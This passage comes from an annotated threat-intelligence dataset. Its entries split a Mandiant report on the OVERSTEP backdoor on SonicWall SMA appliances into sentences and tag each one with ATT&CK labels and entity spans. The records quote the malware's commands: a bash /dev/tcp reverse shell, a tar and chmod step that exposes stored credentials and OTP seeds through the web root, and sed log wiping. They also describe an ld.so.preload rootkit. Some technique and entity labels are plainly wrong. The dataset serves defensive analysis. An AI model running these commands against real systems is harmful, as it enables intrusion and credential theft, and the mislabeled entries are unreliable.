"id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1574.006", "name": "Hijack Execution Flow: Dynamic Linker Hijacking" } ], "procedure": "Map the malicious library into the address space of subsequently launched processes through preloading.", "entities": [ { "text": "preloaded in this manner", "start": 5, "end": 29, "label": "Action" }, { "text": "malicious library", "start": 35, "end": 52, "label": "MalwareTool" }, { "text": "mapped into the address space of subsequently launched processes", "start": 56, "end": 120, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s68-676b49", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "When preloaded in this manner, the malicious library is mapped into the address space of subsequently launched processes.", "sentence_text": "The backdoor's primary functionalities are to establish a reverse shell and exfiltrate passwords from the compromised host.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Establish a reverse shell and exfiltrate passwords from the compromised host.", "entities": [ { "text": "backdoor", "start": 4, "end": 12, "label": "MalwareTool" }, { "text": "establish a reverse shell", "start": 46, "end": 71, "label": "Action" }, { "text": "reverse shell", "start": 58, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "exfiltrate passwords", "start": 76, "end": 96, "label": "Action" }, { "text": "compromised host", "start": 106, "end": 122, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s69-06c2bc", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "The backdoor's primary functionalities are to establish a reverse shell and exfiltrate passwords from the compromised host.", "sentence_text": "Communications with the command-and-control (C2 or C&C) server are indirect, relying on parsing commands from buffers intercepted by the malicious write API.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Parse C2 commands from intercepted write API buffers", "entities": [ { "text": " command-and-control (C2 or C&C) server", "start": 23, "end": 62, "label": "Infrastructure_Indicator" }, { "text": " buffers", "start": 109, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "malicious write API", "start": 137, "end": 156, "label": "MalwareTool" }, { "text": "relying", "start": 77, "end": 84, "label": "Action" }, { "text": "intercepted", "start": 118, "end": 129, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s70-7d7329", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "Communications with the command-and-control (C2 or C&C) server are indirect, relying on parsing commands from buffers intercepted by the malicious write API.", "sentence_text": "The path to the malicious shared object was added to the /etc/ld.so.preload file, which effectively ensures the malware will persist on the compromised appliance.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574.006", "name": "Dynamic Linker Hijacking" } ], "procedure": "Add malicious shared object path to /etc/ld.so.preload for persistence", "entities": [ { "text": " malicious shared object", "start": 15, "end": 39, "label": "MalwareTool" }, { "text": " /etc/ld.so.preload file", "start": 56, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "added", "start": 44, "end": 49, "label": "Action" }, { "text": " ensures", "start": 99, "end": 107, "label": "Action" }, { "text": "malware", "start": 112, "end": 119, "label": "MalwareTool" }, { "text": "persist", "start": 125, "end": 132, "label": "Action" }, { "text": "compromised appliance", "start": 140, "end": 161, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s71-9fc005", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "The path to the malicious shared object was added to the /etc/ld.so.preload file, which effectively ensures the malware will persist on the compromised appliance.", "sentence_text": "Due to its inclusion in the /etc/ld.so.preload file, the malware's shared object is mapped into every new process executed on the compromised system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1574.006", "name": "Hijack Execution Flow: Dynamic Linker Hijacking" } ], "procedure": "Map the malware shared object into every new process executed on the compromised system through /etc/ld.so.preload.", "entities": [ { "text": "/etc/ld.so.preload", "start": 28, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "malware's shared object", "start": 57, "end": 80, "label": "MalwareTool" }, { "text": "mapped into every new process", "start": 84, "end": 113, "label": "Action" }, { "text": "executed on the compromised system", "start": 114, "end": 148, "label": "Action" }, { "text": "compromised system", "start": 130, "end": 148, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s72-7d93d0", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "Due to its inclusion in the /etc/ld.so.preload file, the malware's shared object is mapped into every new process executed on the compromised system.", "sentence_text": "This my_init function then sets the FS_IMMUTABLE_FL flag on /etc/ld.so.preload , effectively preventing its modification, deletion, renaming, or the creation of links to it.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": "Set the FS_IMMUTABLE_FL flag on /etc/ld.so.preload to prevent modification, deletion, or renaming.", "entities": [ { "text": "sets the FS_IMMUTABLE_FL flag on /etc/ld.so.preload", "start": 27, "end": 78, "label": "Action" }, { "text": "/etc/ld.so.preload", "start": 60, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s73-015512", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "This my_init function then sets the FS_IMMUTABLE_FL flag on /etc/ld.so.preload , effectively preventing its modification, deletion, renaming, or the creation of links to it.", "sentence_text": "The hijacked open* and readdir * APIs are leveraged to implement a usermode rootkit, concealing the malware's presence and components.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.006", "name": "Dynamic Linker Hijacking" } ], "procedure": "implement a usermode rootkit by hijacking open* and readdir APIs", "entities": [ { "text": "open* and readdir * APIs", "start": 13, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "leveraged", "start": 42, "end": 51, "label": "Action" }, { "text": "hijack", "start": 4, "end": 10, "label": "Action" }, { "text": " implement ", "start": 54, "end": 65, "label": "Action" }, { "text": " usermode rootkit", "start": 66, "end": 83, "label": "MalwareTool" }, { "text": "concealing", "start": 85, "end": 95, "label": "Action" }, { "text": "malware", "start": 100, "end": 107, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s74-790921", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "The hijacked open* and readdir * APIs are leveraged to implement a usermode rootkit, concealing the malware's presence and components.", "sentence_text": "The rootkit and backdoor functionalities are described in greater detail in the subsequent sections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s75-a8ae36", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "The rootkit and backdoor functionalities are described in greater detail in the subsequent sections.", "sentence_text": "The malware's implementation of these functions checks if the requested file path is /etc/ld.so.preload .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": "checks if the requested file path is /etc/ld.so.preload", "entities": [ { "text": " malware", "start": 3, "end": 11, "label": "MalwareTool" }, { "text": "/etc/ld.so.preload", "start": 85, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "checks", "start": 48, "end": 54, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s76-f2130c", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "The malware's implementation of these functions checks if the requested file path is /etc/ld.so.preload .", "sentence_text": "If a match occurs, it returns an error code, thereby preventing any process on the compromised system from opening this critical file.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": "returns an error code to prevent opening /etc/ld.so.preload", "entities": [ { "text": "preventing ", "start": 53, "end": 64, "label": "Action" }, { "text": "compromised system", "start": 83, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "returns an error code", "start": 22, "end": 43, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s77-537674", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "If a match occurs, it returns an error code, thereby preventing any process on the compromised system from opening this critical file.", "sentence_text": "The hijacked\nreaddir\nand\nreaddir64\nAPI functions are used to conceal the following artifacts from directory listings:\n/proc", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1564.001", "name": "Hidden Files and Directories" } ], "procedure": ": hijacked readdir functions used to conceal artifacts from directory listings", "entities": [ { "text": "hijacked", "start": 4, "end": 12, "label": "Action" }, { "text": " conceal ", "start": 60, "end": 69, "label": "Action" }, { "text": "readdir64\nAPI functions", "start": 25, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "/proc", "start": 118, "end": 123, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s78-003995", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "The hijacked\nreaddir\nand\nreaddir64\nAPI functions are used to conceal the following artifacts from directory listings:\n/proc", "sentence_text": "entries related to bash , sh , or ssh libsamba-errors.so.6 (the filename of the malware observed on this particular system)\n/etc/ld.so.preload\nBackdoor\nThe backdoor's command execution mechanism is centered on its hijacked write API function.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "hijacked write API function for command execution", "entities": [ { "text": "malware", "start": 80, "end": 87, "label": "MalwareTool" }, { "text": "execution", "start": 175, "end": 184, "label": "Action" }, { "text": " libsamba-errors.so.6", "start": 37, "end": 58, "label": "MalwareTool" }, { "text": "Backdoor", "start": 143, "end": 151, "label": "MalwareTool" }, { "text": "backdoor", "start": 156, "end": 164, "label": "MalwareTool" }, { "text": "/etc/ld.so.preload", "start": 124, "end": 142, "label": "Infrastructure_Indicator" }, { "text": " bash , sh , or ssh", "start": 18, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "hijacked write API function", "start": 214, "end": 241, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s79-0037a4", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "entries related to bash , sh , or ssh libsamba-errors.so.6 (the filename of the malware observed on this particular system)\n/etc/ld.so.preload\nBackdoor\nThe backdoor's command execution mechanism is centered on its hijacked write API function.", "sentence_text": "The standard write API receives a buffer containing data destined for an I/O stream.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s80-101cdd", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "The standard write API receives a buffer containing data destined for an I/O stream.", "sentence_text": "If either string is detected, the malware expects to find associated command parameters immediately following it.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Detect command strings and read associated command parameters that immediately follow them.", "entities": [ { "text": "malware", "start": 34, "end": 41, "label": "MalwareTool" }, { "text": "expects to find associated command parameters", "start": 42, "end": 87, "label": "Action" }, { "text": "command parameters", "start": 69, "end": 87, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s81-ac9540", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "If either string is detected, the malware expects to find associated command parameters immediately following it.", "sentence_text": "dobackshell\nStarts a reverse shell using the command bash -i >& /dev/tcp// 0>&1 & Parameters: IP address and port.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.001", "name": "Internal Proxy" } ], "procedure": "Starts a reverse shell using bash -i >& /dev/tcp// 0>&1", "entities": [ { "text": "Starts", "start": 12, "end": 18, "label": "Action" }, { "text": "dobackshell", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": " reverse shell ", "start": 20, "end": 35, "label": "MalwareTool" }, { "text": "using", "start": 35, "end": 40, "label": "Action" }, { "text": "bash -i >& /dev/tcp// 0>&1 ", "start": 53, "end": 90, "label": "MalwareTool" }, { "text": ": IP address and port", "start": 102, "end": 123, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s82-63da35", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "dobackshell\nStarts a reverse shell using the command bash -i >& /dev/tcp// 0>&1 & Parameters: IP address and port.", "sentence_text": "dopasswords\nCreates a TAR archive with the provided , bundling sensitive files using the command in Figure 3.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Creates a TAR archive bundling sensitive files", "entities": [ { "text": ", bundling sensitive files", "start": 62, "end": 88, "label": "Action" }, { "text": "Creates a TAR archive ", "start": 12, "end": 34, "label": "Action" }, { "text": "dopasswords", "start": 0, "end": 11, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s83-916a98", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "dopasswords\nCreates a TAR archive with the provided , bundling sensitive files using the command in Figure 3.", "sentence_text": "Notably, the TAR archive is saved in the web-accessible directory /usr/src/EasyAccess/www/htdocs with permissive permissions.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "saves TAR archive in web-accessible directory with permissive permissions", "entities": [ { "text": "TAR archive", "start": 13, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "/usr/src/EasyAccess/www/htdocs ", "start": 66, "end": 97, "label": "Infrastructure_Indicator" }, { "text": " saved", "start": 27, "end": 33, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s84-a9c9ce", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "Notably, the TAR archive is saved in the web-accessible directory /usr/src/EasyAccess/www/htdocs with permissive permissions.", "sentence_text": "This allows an attacker to download the archive via a web browser.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "download the archive via a web browser", "entities": [ { "text": "attacker", "start": 15, "end": 23, "label": "ThreatActor" }, { "text": "download ", "start": 27, "end": 36, "label": "Action" }, { "text": "archive", "start": 40, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s85-6844cd", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "This allows an attacker to download the archive via a web browser.", "sentence_text": "Parameters: Filename of the TAR archive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s86-6b8b74", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "Parameters: Filename of the TAR archive.", "sentence_text": "tar czfP /usr/src/EasyAccess/www/htdocs/.tgz /tmp/temp.db /etc/EasyAccess/var/conf/persist.db /etc/EasyAccess/var/cert; chmod 777 /usr/src/EasyAccess/www/htdocs/.tgz dopasswords OVERSTEP command Following the parsing and execution of a command, the malware attempts to remove corresponding entries from affected log files.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.001", "name": "Clear Windows Event Logs" } ], "procedure": "remove entries from log files following command execution", "entities": [ { "text": " OVERSTEP", "start": 197, "end": 206, "label": "MalwareTool" }, { "text": " dopasswords", "start": 185, "end": 197, "label": "MalwareTool" }, { "text": "malware ", "start": 269, "end": 277, "label": "MalwareTool" }, { "text": "/etc/EasyAccess/var/conf/persist.db", "start": 68, "end": 103, "label": "Infrastructure_Indicator" }, { "text": " /usr/src/EasyAccess/www/htdocs/.tgz /tmp/temp.db", "start": 8, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "/etc/EasyAccess/var/cert;", "start": 104, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "/usr/src/EasyAccess/www/htdocs/.tgz", "start": 140, "end": 185, "label": "Infrastructure_Indicator" }, { "text": " parsing", "start": 228, "end": 236, "label": "Action" }, { "text": " execution", "start": 240, "end": 250, "label": "Action" }, { "text": "attempts to remove", "start": 277, "end": 295, "label": "Action" }, { "text": "affected log files", "start": 323, "end": 341, "label": "Infrastructure_Indicator" }, { "text": "chmod 777 /usr/src/EasyAccess/www/htdocs/.tgz", "start": 130, "end": 185, "label": "Action" }, { "text": "tar czfP /usr/src/EasyAccess/www/htdocs/.tgz", "start": 0, "end": 54, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s87-5fc529", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "tar czfP /usr/src/EasyAccess/www/htdocs/.tgz /tmp/temp.db /etc/EasyAccess/var/conf/persist.db /etc/EasyAccess/var/cert; chmod 777 /usr/src/EasyAccess/www/htdocs/.tgz dopasswords OVERSTEP command Following the parsing and execution of a command, the malware attempts to remove corresponding entries from affected log files.", "sentence_text": "This cleanup is performed using the sed command:\nsed -i '//d' /var/log/ , where is either dobackshell or dopasswords .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.002", "name": "Clear Linux or Mac System Logs" } ], "procedure": "This cleanup is performed using the sed command to remove log entries from log files.", "entities": [ { "text": "sed -i '//d' /var/log/", "label": "Action", "start": 49, "end": 86 }, { "text": "/var/log/", "label": "Infrastructure_Indicator", "start": 67, "end": 86 } ] }, { "uid": "mandiant-37_mandiant_report-p1-s88-461757", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "This cleanup is performed using the sed command:\nsed -i '//d' /var/log/ , where is either dobackshell or dopasswords .", "sentence_text": "The targeted can be , , or inotify.log .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s89-00ddf0", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "The targeted can be , , or inotify.log .", "sentence_text": "This log cleaning process is only initiated if the malware can successfully elevate its privileges by setting its UID and GID to Receiving Commands The malware was designed to receive commands embedded within web requests.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Receive commands embedded within web requests.", "entities": [ { "text": "receive commands embedded within web requests", "start": 176, "end": 221, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s90-600099", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "This log cleaning process is only initiated if the malware can successfully elevate its privileges by setting its UID and GID to Receiving Commands The malware was designed to receive commands embedded within web requests.", "sentence_text": "The server would then attempt to log this request to files such as , , or inotify.log .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s91-51b952", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "The server would then attempt to log this request to files such as , , or inotify.log .", "sentence_text": "The malicious write function then parses the log data and dispatches any recognized command.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "parses log data and dispatches recognized commands", "entities": [ { "text": " malicious write function ", "start": 3, "end": 29, "label": "MalwareTool" }, { "text": "parses the log data", "start": 34, "end": 53, "label": "Action" }, { "text": " dispatches any recognized command", "start": 57, "end": 91, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s92-27c302", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "The malicious write function then parses the log data and dispatches any recognized command.", "sentence_text": "Risk and Post-Compromise Activities In our investigations, GTIG observed beaconing traffic from compromised appliances, but we did not identify notable post-compromise activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s93-9b26c6", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "Risk and Post-Compromise Activities In our investigations, GTIG observed beaconing traffic from compromised appliances, but we did not identify notable post-compromise activities.", "sentence_text": "The actor's success in hiding their tracks is largely due to OVERSTEP's capability to selectively delete log entries from , , and inotify.log .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.002", "name": "Clear Linux or Mac System Logs" } ], "procedure": "selectively delete log entries from log files", "entities": [ { "text": "actor", "start": 4, "end": 9, "label": "ThreatActor" }, { "text": "OVERSTEP", "start": 61, "end": 69, "label": "MalwareTool" }, { "text": "hiding their tracks ", "start": 23, "end": 43, "label": "Action" }, { "text": "and inotify.log", "start": 126, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "delete log entries", "start": 98, "end": 116, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s94-d8bbf0", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "The actor's success in hiding their tracks is largely due to OVERSTEP's capability to selectively delete log entries from , , and inotify.log .", "sentence_text": "The primary risk stems from OVERSTEP's functionality to steal sensitive files.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "steal sensitive files", "entities": [ { "text": "OVERSTEP", "start": 28, "end": 36, "label": "MalwareTool" }, { "text": " steal", "start": 55, "end": 61, "label": "Action" }, { "text": " sensitive files", "start": 61, "end": 77, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s95-9deefb", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "The primary risk stems from OVERSTEP's functionality to steal sensitive files.", "sentence_text": "Its ability to exfiltrate the persist.db database and certificate files from the /etc/EasyAccess/var/cert directory gives the attacker credentials, OTP seeds, and certificates.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.003", "name": "NTDS" } ], "procedure": "exfiltrate persist.db and certificate files", "entities": [ { "text": "exfiltrate", "start": 15, "end": 25, "label": "Action" }, { "text": "attacker", "start": 126, "end": 134, "label": "ThreatActor" }, { "text": " persist.db database", "start": 29, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "certificate files", "start": 54, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "/etc/EasyAccess/var/cert", "start": 81, "end": 105, "label": "Infrastructure_Indicator" }, { "text": " credentials", "start": 134, "end": 146, "label": "Infrastructure_Indicator" }, { "text": " OTP seeds", "start": 147, "end": 157, "label": "Infrastructure_Indicator" }, { "text": "certificates", "start": 163, "end": 175, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s96-cad998", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "Its ability to exfiltrate the persist.db database and certificate files from the /etc/EasyAccess/var/cert directory gives the attacker credentials, OTP seeds, and certificates.", "sentence_text": "While we did not directly observe the weaponization of this stolen data, it creates a clear path for persistent access.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "weaponization of stolen data for persistent access", "entities": [ { "text": "weaponization ", "start": 38, "end": 52, "label": "Action" }, { "text": "persistent access", "start": 101, "end": 118, "label": "Action" }, { "text": "stolen data", "start": 60, "end": 71, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s97-56bce4", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "While we did not directly observe the weaponization of this stolen data, it creates a clear path for persistent access.", "sentence_text": "Impacted organizations should rotate all secrets stored on the appliances and follow the recommendations in this article.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s98-371f26", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "Impacted organizations should rotate all secrets stored on the appliances and follow the recommendations in this article.", "sentence_text": "Wider Context and Campaigns This campaign extends beyond the incidents GTIG directly investigated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s99-07134f", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "Wider Context and Campaigns This campaign extends beyond the incidents GTIG directly investigated.", "sentence_text": "We have identified targeting of other SonicWall SMA appliances by UNC6148, including possible scanning activity dating back to at least October 2024.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "scanning activity targeting SonicWall SMA appliances", "entities": [ { "text": "targeting", "start": 19, "end": 28, "label": "Action" }, { "text": "UNC6148", "start": 66, "end": 73, "label": "ThreatActor" }, { "text": "scanning activity", "start": 94, "end": 111, "label": "Action" }, { "text": "SonicWall SMA appliances ", "start": 38, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s100-4a2d28", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "We have identified targeting of other SonicWall SMA appliances by UNC6148, including possible scanning activity dating back to at least October 2024.", "sentence_text": "Our findings are also supported by SonicWall, which has confirmed reports of other impacted organizations and subsequently updated its advisory for CVE-2024-38475 to recommend OTP seed rotation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s101-18e7ca", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "Our findings are also supported by SonicWall, which has confirmed reports of other impacted organizations and subsequently updated its advisory for CVE-2024-38475 to recommend OTP seed rotation.", "sentence_text": "Additionally, UNC6148 activity has noteworthy overlaps with historical analysis from Truesec and dfir.ch , which involved the deployment of Abyss-branded ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "deployment of Abyss-branded ransomware", "entities": [ { "text": "UNC6148", "start": 14, "end": 21, "label": "ThreatActor" }, { "text": "Truesec", "start": 85, "end": 92, "label": "ThreatActor" }, { "text": "dfir.ch", "start": 97, "end": 104, "label": "ThreatActor" }, { "text": " deployment", "start": 125, "end": 136, "label": "Action" }, { "text": "Abyss-branded ransomware", "start": 140, "end": 164, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s102-0e78c7", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "Additionally, UNC6148 activity has noteworthy overlaps with historical analysis from Truesec and dfir.ch , which involved the deployment of Abyss-branded ransomware.", "sentence_text": "The OVERSTEP backdoor and deployment mechanism observed by Mandiant appears to be a direct evolution of the wafxSummary tool reported by Truesec in late 2023.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "Evolution of the OVERSTEP backdoor and its deployment mechanism from the earlier wafxSummary tool.", "entities": [ { "text": "OVERSTEP backdoor", "start": 4, "end": 21, "label": "MalwareTool" }, { "text": "wafxSummary", "start": 108, "end": 119, "label": "MalwareTool" }, { "text": "observed by Mandiant appears to be a direct evolution ", "start": 47, "end": 101, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s103-860ceb", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "The OVERSTEP backdoor and deployment mechanism observed by Mandiant appears to be a direct evolution of the wafxSummary tool reported by Truesec in late 2023.", "sentence_text": "A dfir.ch blog post from early 2024 describes an intrusion where nearly a year went by between the deployment of the wafxSummary tool Truesec wrote about, and the deployment of Abyss-branded ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "deployment of wafxSummary tool and Abyss-branded ransomware", "entities": [ { "text": "intrusion", "start": 49, "end": 58, "label": "Action" }, { "text": "deployment ", "start": 99, "end": 110, "label": "Action" }, { "text": " wafxSummary tool ", "start": 116, "end": 134, "label": "MalwareTool" }, { "text": "deployment ", "start": 163, "end": 174, "label": "Action" }, { "text": "Abyss-branded ransomware", "start": 177, "end": 201, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s104-086baa", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "A dfir.ch blog post from early 2024 describes an intrusion where 